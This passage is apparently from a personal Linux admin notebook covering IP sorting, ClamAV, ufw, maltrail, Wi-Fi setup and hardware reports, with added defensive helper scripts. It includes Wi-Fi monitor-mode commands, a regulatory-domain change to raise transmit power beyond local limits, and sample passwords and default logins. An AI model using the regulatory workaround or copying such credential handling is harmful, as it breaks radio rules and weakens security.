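`audit_unit /etc/systemd/system/test.service` on a real unit prints nothing and returns 0 when it is clean; the hardened sample also shows the directives (NoNewPrivileges, ProtectSystem, ProtectHome, PrivateTmp) that limit what the script can touch even if it is compromised.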
---[Sort text file by IP address]--- (top)
$ sort -t . -k 3,3n -k 4,4n /path/to/file
Where:
  -t .  : use . (dot) as the field separator, since the octets of an IP are separated by dots
  -n    : sort according to numerical value
  -k    : sort on the given field (column). For example, -k 2 sorts on the second column.
          -k 3,3n -k 4,4n sorts each column in turn: first the 3rd column, then the 4th.
Also:
$ sort -t . -g -k1,1 -k2,2 -k3,3 -k4,4 IPs.txt | uniq
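The two-key form above is enough only when every address shares the same first two octets; for a mixed list the first two keys matter too. As an added example (not from the notes), the four-key sort on a constructed list, with the two-key form run on the same input for comparison.

```shell
#!/bin/sh
# Added example: sort dotted-quad addresses numerically on all four octets.

# Reads addresses on stdin, one per line; prints them sorted and de-duplicated.
sort_ips() {
    sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n | uniq
}

# What the two-key form from the notes does with the same input.
sort_ips_last_two_octets() {
    sort -t . -k 3,3n -k 4,4n | uniq
}

# Constructed sample (not from a real log): out of order, with a duplicate, and
# with 10.0.0.10 / 10.0.0.5 so a plain lexical sort would misorder them.
sample_ips() {
    printf '%s\n' 192.168.1.10 10.0.0.5 172.16.0.1 10.0.0.10 10.0.0.5
}

if [ "${1:-}" = demo ]; then
    echo "all four octets:";   sample_ips | sort_ips
    echo "third+fourth only:"; sample_ips | sort_ips_last_two_octets
fi
```

On the sample, `sort_ips` gives 10.0.0.5, 10.0.0.10, 172.16.0.1, 192.168.1.10, while the two-key form puts 172.16.0.1 first because only its last two octets (0.1) are compared.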
---[Setup Alfa wifi nic on Kali]--- (top)
# apt install realtek-rtl88xxau-dkms
I then had to get the firmware update from Alfa, unzip it and copy the rt2870.bin file into /lib/firmware.
# airmon-ng
PHY     Interface  Driver     Chipset
phy0    wlan0      iwlwifi    Intel Corporation Wireless 7260 (rev 73)
phy201  wlan1      rt2800usb  Ralink Technology, Corp. RT3572
NetworkManager report on connections
$ nmcli connection show
NAME                UUID                                  TYPE      DEVICE
Auto ATTFJ4Br3A     9f57abf0-0bb5-4164-bc21-8afb918cec8e  wifi      wlp2s0
Auto ATTFJ4Br3A     d9e91a3a-2b58-4df9-be2f-8a7304262f0d  wifi      wlx00c0ca8f2b07
Wired connection 1  818c8207-fa7e-31ef-820c-d37b1719fdc0  ethernet  --
Now check a specific connection as listed above
$ nmcli connection show "Auto ATTFJ4Br3A"
connection.id:                          Auto ATTFJ4Br3A
connection.uuid:                        d9e91a3a-2b58-4df9-be2f-8a7304262f0d
connection.stable-id:                   --
connection.type:                        802-11-wireless
connection.interface-name:              --
connection.autoconnect:                 yes
(with as many as 300 more lines of output...)
Get the specs on a NIC
$ ethtool -i wlx00c0ca8f2b07
driver: rt2800usb
version: 4.15.0-65-generic
firmware-version: 0.36
expansion-rom-version:
bus-info: 1-1.3:1.0
supports-statistics: yes
supports-test: no
supports-eeprom-access: no
supports-register-dump: no
supports-priv-flags: no
You can get overall quality of the link. This may be based on the level of contention or interference, the bit or frame error rate, how good the received signal is, some timing synchronisation, or other hardware metric.
# iwconfig wlan0 | grep -i --color quality
Use the watch command to run cat command repeatedly, displaying wireless signal on screen:
watch -n 1 cat /proc/net/wireless
Inter-| sta-|   Quality        |   Discarded packets               | Missed | WE
 face | tus | link level noise |  nwid  crypt   frag  retry   misc | beacon | 22
wlx7cdd90ebf32e: 0000   60.  -50.  -256        0      0      0     36    169        0
Get stats on a NIC
$ iwlist wlx00c0ca8f2b07 scan
wlx00c0ca8f2b07  Scan completed :
          Cell 01 - Address: C6:52:61:97:05:B3
                    Channel:153
                    Frequency:5.765 GHz
                    Quality=70/70  Signal level=-33 dBm
                    Encryption key:on
                    ESSID:"ATTFJ4Br3A"
                    Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
                              36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=00000011e2584721
                    Extra: Last beacon: 10784ms ago
                    IE: Unknown: 000A415454464A3442723341
                    IE: Unknown: 01088C1218243048606C
                    IE: Unknown: 030199
                    IE: Unknown: 0B0505000AFFFF
                    IE: Unknown: 074C55532024017F28017F2C017F30017F34017F38017F3C017F40017F64017F68017F6C017F70017F74017F78017F7C017F80017F84017F88017F8C017F90017F95017F99017F9D017FA1017F00
                    IE: Unknown: 200100
                    IE: Unknown: C305027F7F7F00
                    IE: Unknown: 2D1AEF0117FFFFFFFFFEFFFFFFFF1F000001000000000018E6E71900
                    IE: Unknown: 3D1699070600000000000000000000000000000000000000
                    IE: Unknown: DD180050F20201018D000364000027A4000041435E0061322F00
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 7F080100080200000040
                    IE: Unknown: DDA30050F204104A0001101044000102103B0001031047001059C70E96DA715048FF831CC2D0E4C1E5102100095175616E74656E6E6110230005546F70617A102400064247573231301042000C4336353236313937303542331054000800060050F2040001101100105265666572656E63652044657369676E1008000220081049000600372A000120105800183F0047DA8F56836CB486ACDE9266C7A50001010103007FC5
                    IE: Unknown: BF0CB279C33FAAFF0000AAFF0000
                    IE: Unknown: C005019B00FCFF
                    IE: Unknown: DD1E002686010300DD000000250406920006019B5B8CD2740000000000000000
Move the following into the material above...
Set interface down:
$ sudo ip link set wlan0 down
Set monitor mode:
$ sudo iwconfig wlan0 mode monitor
Set interface up:
$ sudo ip link set wlan0 up
Set channel 6, width 40 MHz:
$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:
$ sudo iw wlan0 set freq 5745 80 5775
To change the tx-power we must turn off the wireless interface:
$ sudo ifconfig wlan0 down
then change the regulatory domain to BO (Bolivia), which allows the use of 1000 mW tx-power:
$ sudo iw reg set BO
turn the wireless interface on again:
$ sudo ifconfig wlan0 up
We can also directly change the tx-power using this command (but this can overheat the NIC):
$ sudo iwconfig wlan0 txpower 30
---[Lynis Audit Tool]--- (top)
sudo cat /var/log/lynis-report.dat | grep warning | sed -e 's/warning\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep suggestion | sed -e 's/suggestion\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep installed_package | sed -e 's/installed_package\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep available_shell | sed -e 's/available_shell\[\]\=//g'
---[Monitorix]--- (top)
Reference: https://www.howtoforge.com/tutorial/performance-monitoring-with-monitorix-on-ubuntu-16-04/ http://kokizzu.blogspot.com/2015/03/monitorix-system-resource-monitoring.html
---[Kasam Short Cuts]--- (top)
Super+Ctrl+R: Start recording
Super+Ctrl+P: Pause recording; press again to resume the recording
Super+Ctrl+F: Finish recording
Super+Ctrl+Q: Quit recording
---[maltrail NIDS]--- (top)
Instructions for installation and running. https://github.com/stamparm/maltrail https://www.techrepublic.com/article/how-to-install-and-run-the-maltrail-detection-system-on-ubuntu-server-18-04/ https://www.howtoforge.com/tutorial/installation-and-usage-of-maltrail-detection-system-on-ubuntu/
1. The Sensor which monitors traffic for threats
2. Server which provides logging for the event details of the detected malicious traffic.
3. The Client that provides visualization and reporting of the event details.
sudo apt-get install git python-pcapy
sudo apt-get install python-setuptools
sudo git clone https://github.com/stamparm/maltrail.git
cd maltrail/
sudo python sensor.py
sudo python server.py
Access the reporting interface by visiting http://local-ip:8338 (default credentials are admin:changeme!, stored in the maltrail.conf file) from your web browser.
The sensor configuration of the Maltrail system is contained in the [Sensor] section of the maltrail.conf file. The configuration parameters are documented with comments. In this configuration file the user can define settings such as the update interval of the static feeds, the virtual or physical Linux interface on which to run the Maltrail sensor, and so on.
---[zaloha.sh]--- (top)
You can synchronize two local directories as shown.
$ sudo zaloha.sh --sourceDir="./admin_portal/" --backupDir="/var/www/html/admin_portal/"
You can also back up to removable media (e.g. /media/aaronk/EXT) mounted on the local file system. The destination directory must exist for the command to work; otherwise you will get the error message “Zaloha.sh: is not a directory”.
$ sudo mkdir /media/aaronk/EXT/admin_portal
$ sudo zaloha.sh --sourceDir="./admin_portal/" --backupDir="/media/aaronk/EXT/admin_portal"
Assuming you have made changes in the backup directory to files that already exist in the source directory, you can make the changes reflect in the source directory using the reverse sync feature, enabled with the --revUp option.
$ zaloha.sh --revUp --sourceDir="/home/aaronk/admin_portal/" --backupDir="/media/aaronk/EXT/admin_portal"
---[clamav]--- (top)
Install:
$ sudo apt install -y clamav
$ sudo apt install -y clamdscan clamav-daemon
$ sudo systemctl restart clamav-daemon   # avoids "condition failed"
$ mkdir ~/virus
$ clamdscan <dir>
Run a scan:
  -r option will scan the directory recursively.
  -i option will show detected files only.
  --move option will move detected files to a specific directory.
Basic:
$ sudo clamscan -r -i --move=$HOME/virus .
My scan example:
$ sudo clamscan -v -i -r -z --exclude-dir=^Hacking --detect-pua=yes --phishing-scan-urls=yes --copy=$HOME/virus ./
Update the virus database with freshclam manually:
$ sudo freshclam
The clamav-freshclam package will update the virus database automatically. If it does not work, try this:
$ sudo systemctl stop clamav-freshclam
$ sudo freshclam
$ sudo systemctl start clamav-freshclam
https://www.hiroom2.com/2018/07/30/linuxmint-19-clamav-en/
Setting up real-time scanning:
https://www.clamav.net/documents/on-access-scanning
https://www.clamav.net/documents/scanning#clamd
And some more...
Update the clamav database:
$ apt-get update
$ apt-get install clamav clamav-daemon -y
$ sudo systemctl enable clamav-daemon
$ sudo systemctl start clamav-daemon
$ systemctl stop clamav-freshclam
$ sudo freshclam
$ systemctl start clamav-freshclam
Run a scan:
$ clamscan -r /
$ clamscan --infected --remove --recursive /home/ubuntu/Desktop/
Check the log:
$ sudo tail /var/log/clamav/clamav.log
Directories to exclude:
--exclude-dir ^/home/parth/Hacking/Actual.Malware
--exclude-dir ^/home/parth/Hacking/Metasploit
--exclude-dir ^/home/parth/Hacking/packetstorm.archives
Weekly scan via /etc/cron.d/clamdscan:
sudo mkdir /home/parth/quarantine
echo "0 1 * * 0 root /usr/bin/clamdscan --fdpass --log=/var/log/clamav/clamdscan.log --move=/home/parth/quarantine /" | sudo tee /etc/cron.d/clamdscan
Summarize the errors and warnings in the log:
sudo grep ERROR /var/log/clamav/clamdscan.log | cut -d":" -f2 | grep "^ " | sort | uniq -c | sort -k1 -n
sudo grep WARNING /var/log/clamav/clamdscan.log | cut -d":" -f2 | grep "^ " | sort | uniq -c | sort -k1 -n
$ clamscan -o -r -i /home/parth/CCCC/
----------- SCAN SUMMARY -----------
Known viruses: 8580277
Engine version: 0.103.3
Scanned directories: 337
Scanned files: 4784
Infected files: 0
Data scanned: 3491.06 MB
Data read: 33298.21 MB (ratio 0.10:1)
Time: 412.373 sec (6 m 52 s)
Start Date: 2021:11:28 11:06:40
End Date:   2021:11:28 11:13:32
So, I will demonstrate a scan on my “Downloads” folder located under the home directory and I will choose to output only infected files and ring a bell when (and if) they are found. This translates to the following command on the terminal: “clamscan -r --bell -i /home/bill/Downloads”.
clamscan -r --bell -i /home/Parth/Downloads
To scan the whole system (it may take a while) and remove all infected files in the process, you can use the command in the following form: “clamscan -r --remove /”.
clamscan -r --remove /
clamscan options: /home/parth/ --infected --log=filename -r -z --exclude-dir=Hacking --detect-structured=yes
clamscan -i --log=/home/parth/clamav.log -r -z --detect-structured=yes --exclude-dir=Hacking /home/parth/
Update the database with freshclam.
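The cron job above writes a log nobody reads unless something checks it. As an added example (not from the notes or from ClamAV), helpers that make an unattended run machine-checkable: clamscan exits 0 when clean, 1 when something was found and 2 on an error, and the SCAN SUMMARY block carries the counts. The sample summary is constructed from the one shown above.

```shell
#!/bin/sh
# Added example: interpret a clamscan/clamdscan run for cron or a wrapper.

clam_exit_meaning() {
    case $1 in
        0) echo clean ;;
        1) echo infected ;;
        2) echo error ;;
        *) echo "unknown exit status $1" ;;
    esac
}

# clam_summary_field FILE "Infected files"  -> prints the field's value
clam_summary_field() {
    sed -n "s/^$2: *//p" "$1" | head -n 1
}

# 0 = summary present and no infections, 1 = infections reported,
# 2 = no SCAN SUMMARY at all (the scan never finished: treat as an error)
clam_summary_status() {
    grep -q 'SCAN SUMMARY' "$1" || return 2
    n=$(clam_summary_field "$1" "Infected files")
    case $n in
        ''|*[!0-9]*) return 2 ;;
        0) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample log in the summary format clamscan prints.
write_sample_summary() {   # $1 = file, $2 = infected count
    cat > "$1" <<EOF
----------- SCAN SUMMARY -----------
Known viruses: 8580277
Engine version: 0.103.3
Scanned directories: 337
Scanned files: 4784
Infected files: $2
Data scanned: 3491.06 MB
Time: 412.373 sec (6 m 52 s)
EOF
}

if [ "${1:-}" = demo ]; then
    log=$(mktemp); write_sample_summary "$log" 0
    rc=0; clam_summary_status "$log" || rc=$?
    echo "summary status: $rc ($(clam_exit_meaning "$rc"))"
    rm -f "$log"
fi
```

In the cron job above, `clam_summary_status /var/log/clamav/clamdscan.log` after the scan (or checking clamdscan's own exit status with clam_exit_meaning) is what turns a quarantined file into an alert instead of a line in a log.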
---[ufw]--- (top)
https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-18-04
https://help.ubuntu.com/community/UFW
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw logging on
sudo ufw logging high
sudo ufw allow 80
sudo ufw allow 443
The log file is /var/log/ufw.log
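With logging on, the useful question is who is hitting the deny rule and on which ports. As an added example (not from the notes or from ufw), two summaries over the kernel-format lines ufw writes, run on a constructed sample log; the addresses are RFC 5737 documentation ranges, not real traffic.

```shell
#!/bin/sh
# Added example: summarise what ufw's LOG rules are blocking.
# Point it at /var/log/ufw.log to see which sources and ports are being probed.

# Count blocked packets per source address, most active first.
ufw_blocked_sources() {
    grep '\[UFW BLOCK\]' "$1" | awk '
        { for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) { sub(/^SRC=/, "", $i); n[$i]++ } }
        END { for (s in n) print n[s], s }' | sort -rn
}

# Count blocked packets per protocol/destination port.
ufw_blocked_ports() {
    grep '\[UFW BLOCK\]' "$1" | awk '
        { proto = "?"; port = "?"
          for (i = 1; i <= NF; i++) {
              if ($i ~ /^PROTO=/) { sub(/^PROTO=/, "", $i); proto = $i }
              if ($i ~ /^DPT=/)   { sub(/^DPT=/, "", $i);   port  = $i }
          }
          n[proto "/" port]++ }
        END { for (k in n) print n[k], k }' | sort -rn
}

# Constructed sample in the format ufw logs (not real traffic).
write_sample_ufw_log() {
    cat > "$1" <<'EOF'
Mar  3 10:15:01 gw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.45 DST=192.0.2.10 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=54321 PROTO=TCP SPT=40123 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:15:02 gw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.45 DST=192.0.2.10 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=54322 PROTO=TCP SPT=40124 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:15:03 gw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.45 DST=192.0.2.10 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=54323 PROTO=TCP SPT=40125 DPT=23 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:16:40 gw kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=1 PROTO=TCP SPT=55555 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  3 10:17:00 gw kernel: [UFW ALLOW] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.77 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2 PROTO=TCP SPT=51000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
EOF
}

if [ "${1:-}" = demo ]; then
    log=$(mktemp); write_sample_ufw_log "$log"
    echo "sources:"; ufw_blocked_sources "$log"
    echo "ports:";   ufw_blocked_ports "$log"
    rm -f "$log"
fi
```

The ALLOW line is deliberately ignored; on the sample the output is `3 203.0.113.45` / `1 198.51.100.7` for sources and `2 TCP/22` at the top of the ports list.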
---[CrashPlan Code42]--- (top)
The default directory is /usr/local/crashplan/bin.
Stop:  ./CrashPlanEngine stop
Start: ./CrashPlanEngine start
After starting the Code42 service, open the Code42 app. If you do not have a shortcut to open the Code42 app, you can open it from terminal with the following command:
/usr/local/crashplan/bin/CrashPlanDesktop
---[OBS Studio - Screen Recording]--- (top)
https://obsproject.com/
For Linux
sudo apt-get install ffmpeg
sudo add-apt-repository ppa:obsproject/obs-studio
sudo apt-get update
sudo apt-get install obs-studio
---[Adding a repository]--- (top)
To use our debian/ubuntu stable repository:
install the Jitsi repository key onto your system
wget -qO - https://download.jitsi.org/jitsi-key.gpg.key | sudo apt-key add -
create sources.list.d file with the repository
sudo sh -c "echo 'deb https://download.jitsi.org stable/' > /etc/apt/sources.list.d/jitsi-stable.list"
update your package list
sudo apt-get -y update
install Jitsi
sudo apt-get -y install jitsi
---[WiFi Commands]--- (top)
Set the AP you want to connect to (network-essid)
sudo iwconfig wlan0 essid network-essid
Set you frequency
sudo iwconfig wlan0 freq 2.422G
---[Connecting To AP]--- (top)
Bring the wlan0 interface up
sudo ifconfig wlan0 up
Scan for APs
sudo iwlist wlan0 scan
Selected Wifi2Home AP with a key of ABCDE12345
sudo iwconfig wlan0 essid Wifi2Home key s:ABCDE12345
Get the IP assignment from DHCP
sudo dhclient wlan0
To disconnect, bring the interface back down:
sudo ifconfig wlan0 down
Another approach is:
First, make sure your wireless card is enabled. You can use rfkill. This will report if the WiFi is disabled by either software or hardware.
rfkill list
You can unblock the software blocks with this, and the hardware blocks with the switch on the machine.
rfkill unblock wifi
Find your WiFi interface
iwconfig
Bring that interface up
sudo ifconfig wlp4s0 up
List the available APs
$ sudo iwlist wlp2s0 scan | grep ESSID
                    ESSID:"ATTFJ4Br3A"
                    ESSID:"ATTFJ4Br3A_2GEXT"
                    ESSID:"ATTFJ4Br3A"
                    ESSID:"ATTB2f6CTA"
                    ESSID:"DIRECT-65-HP ENVY 4510 series"
                    ESSID:"ATTB2f6CTA"
                    ESSID:"ATTB2f6CTA"
                    ESSID:"ATTFJ4Br3A_5GEXT"
                    ESSID:"Nobility"
                    ESSID:"Peasants "
                    ESSID:""
                    ESSID:"ATTB2f6CTA"
                    ESSID:""
We need to create a file named wpa_supplicant.conf using the wpa_passphrase utility. wpa_supplicant.conf is the configuration file describing all networks that the user wants the computer to connect to. Run the following command to create this file. Replace ESSID and Wi-Fi passphrase with your own.
wpa_passphrase your-ESSID your-wifi-passphrase | sudo tee /etc/wpa_supplicant.conf
Now use the following command to connect your wireless card to wireless access point.
sudo wpa_supplicant -c /etc/wpa_supplicant.conf -i wlp4s0
sudo systemctl stop NetworkManager
sudo dhclient wlp4s0
---[Connecting to Hidden Wireless Network]--- (top)
If your wireless router doesn’t broadcast ESSID, then you need to add the following line in /etc/wpa_supplicant.conf file.
scan_ssid=1
Like below:
network={
    ssid="LinuxBabe.Com Network"
    #psk="12345qwert"
    psk=68add4c5fee7dc3d0dac810f89b805d6d147c01e281f07f475a3e0195
    scan_ssid=1
}
https://www.linuxbabe.com/ubuntu/connect-to-wi-fi-from-terminal-on-ubuntu-18-04-19-04-with-wpa-supplicant
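Two things to fix in the wpa_passphrase | tee step and the network block above: wpa_passphrase leaves the plaintext passphrase behind as a `#psk=` comment line, and tee creates /etc/wpa_supplicant.conf with the default umask, so the Wi-Fi password ends up readable by every local user. As an added example (not from the notes or from wpa_supplicant), a check and a cleaner for that file, run on a constructed copy of the block above; the 64-digit hex psk in the sample is a placeholder, not a real key.

```shell
#!/bin/sh
# Added example: hygiene checks for /etc/wpa_supplicant.conf.

# Checks FILE; prints each problem, returns the number found (0 = fine).
wpa_conf_check() {
    f=$1; found=0
    if grep -q '^[[:space:]]*#psk=' "$f"; then
        echo "plaintext passphrase left in a #psk= comment"; found=$((found + 1))
    fi
    # a psk= line must be a quoted passphrase or exactly 64 hex digits
    if grep '^[[:space:]]*psk=' "$f" | grep -Eqv '^[[:space:]]*psk=("[^"]*"|[0-9a-fA-F]{64})[[:space:]]*$'; then
        echo "psk= value is neither a quoted passphrase nor 64 hex digits"; found=$((found + 1))
    fi
    perms=$(ls -ld "$f" | cut -c5-10)      # group+other bits of "-rw-------"
    if [ "$perms" != "------" ]; then
        echo "file is readable by group/other (mode $(ls -ld "$f" | cut -c1-10))"; found=$((found + 1))
    fi
    return "$found"
}

# Copies SRC to DST without the #psk= comment lines, mode 0600.
wpa_conf_clean() {
    src=$1; dst=$2
    ( umask 077; grep -v '^[[:space:]]*#psk=' "$src" > "$dst" ) && chmod 600 "$dst"
}

# Constructed sample in the shape wpa_passphrase prints, created world-readable
# the way "| sudo tee" leaves it.  The hex psk is a placeholder.
write_sample_wpa_conf() {
    cat > "$1" <<'EOF'
network={
    ssid="LinuxBabe.Com Network"
    #psk="12345qwert"
    psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
    scan_ssid=1
}
EOF
    chmod 644 "$1"
}

if [ "${1:-}" = demo ]; then
    d=$(mktemp); write_sample_wpa_conf "$d"
    wpa_conf_check "$d" || echo "-> $? problem(s)"
    c=$(mktemp); wpa_conf_clean "$d" "$c"
    wpa_conf_check "$c" && echo "cleaned copy ok"
    rm -f "$d" "$c"
fi
```

On a real system: `wpa_conf_check /etc/wpa_supplicant.conf`, then `wpa_conf_clean /etc/wpa_supplicant.conf /etc/wpa_supplicant.conf.new && mv /etc/wpa_supplicant.conf.new /etc/wpa_supplicant.conf`. The scan_ssid=1 line for hidden networks survives the clean.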
---[The find command]--- (top)
Find all files ending with '.err' beginning in the /home/username/ directory.
find /home/username/ -name "*.err"
Find a file called testfile.txt in current and sub-directories.
find . -name testfile.txt
Find all .jpg files in the /home and sub-directories.
find /home -name "*.jpg"
Find an empty file within the current directory.
find . -type f -empty
Find all .db files (ignoring text case) modified in the last 7 days by a user named exampleuser.
find /home -user exampleuser -mtime -7 -iname "*.db"
Search without regard for text case.
-iname
Return only results that do not match the test case.
-not
Search for files.
-type f
Search for directories.
-type d
Search for files modified in the past 7 days.
-mtime -7
---[OpenVPN]--- (top)
Start a connection with an auto-login profile manually:
openvpn --config client.ovpn
Start a connection with a user-locked profile manually:
openvpn --config client.ovpn --auth-user-pass
https://support.strongvpn.com/hc/en-us/articles/360004594693-OpenVPN-Setup-Ubuntu-Linux-Command-Line https://openvpn.net/vpn-server-resources/connecting-to-access-server-with-linux/
---[Connecting to Wifi]--- (top)
Get the name of your network device
ben@ben-b:~$ iw dev
phy#1
    Interface wlx7cdd90ebf32e
        ifindex 4
        wdev 0x100000001
        addr 7c:dd:90:eb:f3:2e
        ssid ATTFJ4Br3A
        type managed
        channel 136 (5680 MHz), width: 40 MHz, center1: 5670 MHz
        txpower 23.00 dBm
phy#0
    Interface wlp2s0
        ifindex 3
        wdev 0x1
        addr c0:f8:da:79:de:fc
        ssid ATTFJ4Br3A_5GEXT
        type managed
Check the Wi-Fi device connection status
root@ben-b:~# iw wlp2s0 link
Connected to bc:a5:11:99:2e:3a (on wlp2s0)
    SSID: ATTFJ4Br3A_5GEXT
    freq: 5765
    signal: -53 dBm
    tx bitrate: 162.0 MBit/s
Scan available Wi-Fi networks
ben@ben-b:~$ sudo iw wlp2s0 scan
BSS bc:a5:11:99:2e:3a(on wlp2s0) -- associated
    TSF: 0 usec (0d, 00:00:00)
    freq: 5765
    beacon interval: 100 TUs
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm
    last seen: 0 ms ago
    SSID: ATTFJ4Br3A_5GEXT
    Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
Bring the interface UP if needed
ben@ben-b:~$ sudo ip link set wlp1s0 up
If you get the following error, your WiFi is hard blocked:
RTNETLINK answers: Operation not possible due to RF-kill
Remove or unblock
ben@ben-b:~$ sudo rfkill unblock all
$ nmcli dev wifi connect ATTFJ4Br3A_5GEXT password ThePassword
verify your connectivity
ben@ben-b:~$ ping 8.8.8.8
---[Findout which AP(s) you are connected to]--- (top)
ben@ben-b:~$ iwconfig
lo        no wireless extensions.
eno1      no wireless extensions.
wlp2s0    IEEE 802.11  ESSID:"ATTFJ4Br3A_5GEXT"
          Mode:Managed  Frequency:5.765 GHz  Access Point: BC:A5:11:99:2E:3A
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
wlx7cdd90ebf32e  IEEE 802.11  ESSID:"ATTFJ4Br3A"
          Mode:Managed  Frequency:5.68 GHz  Access Point: C6:52:61:97:05:B3
          Bit Rate=162 Mb/s   Tx-Power=23 dBm
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:on
          Link Quality=60/70  Signal level=-50 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:48   Missed beacon:0
---[System Report]--- (top)
ben@ben-b:~$ inxi -Fz
System:    Host: ben-b Kernel: 5.3.0-46-generic x86_64 bits: 64 Desktop: Cinnamon 4.4.8 Distro: Linux Mint 19.3 Tricia
Machine:   Type: Laptop System: Dell product: Latitude E6520 v: 01 serial: <filter>
           Mobo: Dell model: 0NVF5K v: A01 serial: <filter> BIOS: Dell v: A21 date: 03/06/2018
Battery:   ID-1: BAT0 charge: 21.7 Wh condition: 21.7/60.0 Wh (36%)
CPU:       Topology: Dual Core model: Intel Core i5-2540M bits: 64 type: MT MCP L2 cache: 3072 KiB
           Speed: 1350 MHz min/max: 800/3300 MHz Core speeds (MHz): 1: 1255 2: 1179 3: 2491 4: 1198
Graphics:  Device-1: Intel 2nd Generation Core Processor Family Integrated Graphics driver: i915 v: kernel
           Display: x11 server: X.Org 1.20.5 driver: modesetting unloaded: fbdev,vesa resolution: 1366x768~60Hz
           OpenGL: renderer: Mesa DRI Intel Sandybridge Mobile v: 3.3 Mesa 19.2.8
Audio:     Device-1: Intel 6 Series/C200 Series Family High Definition Audio driver: snd_hda_intel
           Sound Server: ALSA v: k5.3.0-46-generic
Network:   Device-1: Intel 82579LM Gigabit Network driver: e1000e
           IF: eno1 state: down mac: <filter>
           Device-2: Broadcom and subsidiaries BCM43228 802.11a/b/g/n driver: wl
           IF: wlp2s0 state: up mac: <filter>
           Device-3: Ralink RT5572 Wireless Adapter type: USB driver: rt2800usb
           IF: wlx7cdd90ebf32e state: up mac: <filter>
Drives:    Local Storage: total: 931.51 GiB used: 74.79 GiB (8.0%)
           ID-1: /dev/sda vendor: Western Digital model: WD10SPZX-22Z10T1 size: 931.51 GiB
Partition: ID-1: / size: 914.21 GiB used: 74.31 GiB (8.1%) fs: ext4 dev: /dev/dm-1
           ID-2: /boot size: 703.5 MiB used: 486.7 MiB (69.2%) fs: ext4 dev: /dev/sda1
           ID-3: swap-1 size: 976.0 MiB used: 0 KiB (0.0%) fs: swap dev: /dev/dm-2
Sensors:   System Temperatures: cpu: 46.0 C mobo: 22.0 C sodimm: 28.0 C
           Fan Speeds (RPM): cpu: 0
Info:      Processes: 250 Uptime: 22h 24m Memory: 15.52 GiB used: 5.20 GiB (33.5%) Shell: bash inxi: 3.0.32
---[List APs]--- (top)
ben@ben-b:~$ sudo nmcli dev wifi
IN-USE  SSID              MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
*       ATTFJ4Br3A_5GEXT  Infra  153   270 Mbit/s  67      ▂▄▆_  WPA2
IN-USE  SSID              MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
*       ATTFJ4Br3A        Infra  136   540 Mbit/s  68      ▂▄▆_  WPA2
ben@ben-b:~$ nmcli -f ALL dev wifi
NAME   SSID              SSID-HEX                          BSSID              MODE   CHAN  FREQ      RATE
AP[1]  ATTFJ4Br3A_5GEXT  415454464A34427233415F3547455854  BC:A5:11:99:2E:3A  Infra  153   5765 MHz  270 Mbi
NAME   SSID              SSID-HEX                          BSSID              MODE   CHAN  FREQ      RATE        SIGNAL  BARS
AP[1]  ATTFJ4Br3A        415454464A3442723341              C6:52:61:97:05:B3  Infra  136   5680 MHz  540 Mbit/s  66      ▂▄▆_
---[Setup for Misbehaving]--- (top)
Setup
---[Find the GPU driver version]--- (top)
ben@ben-b:~$ sudo update-pciids
Downloaded daily snapshot dated 2020-05-17 03:15:02
ben@ben-b:~$ lspci -v | less
00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller])
        Subsystem: Dell 2nd Generation Core Processor Family Integrated Graphics Controller
        Flags: bus master, fast devsel, latency 0, IRQ 33
        Memory at e1400000 (64-bit, non-prefetchable) [size=4M]
        Memory at d0000000 (64-bit, prefetchable) [size=256M]
        I/O ports at 4000 [size=64]
        [virtual] Expansion ROM at 000c0000 [disabled] [size=128K]
        Capabilities:
        Kernel driver in use: i915
        Kernel modules: i915
This laptop has both an Intel Core GPU and an NVIDIA GeForce 610M. However, both cards have the “[VGA controller]” string, which usually indicates which GPU is in use.
---[Watch]--- (top)
For CPU temps, we will combine watch with the sensors command.
watch -n 2 sensors
---[USB Types and Info]--- (top)
---[Test for Bad Sectors]--- (top)
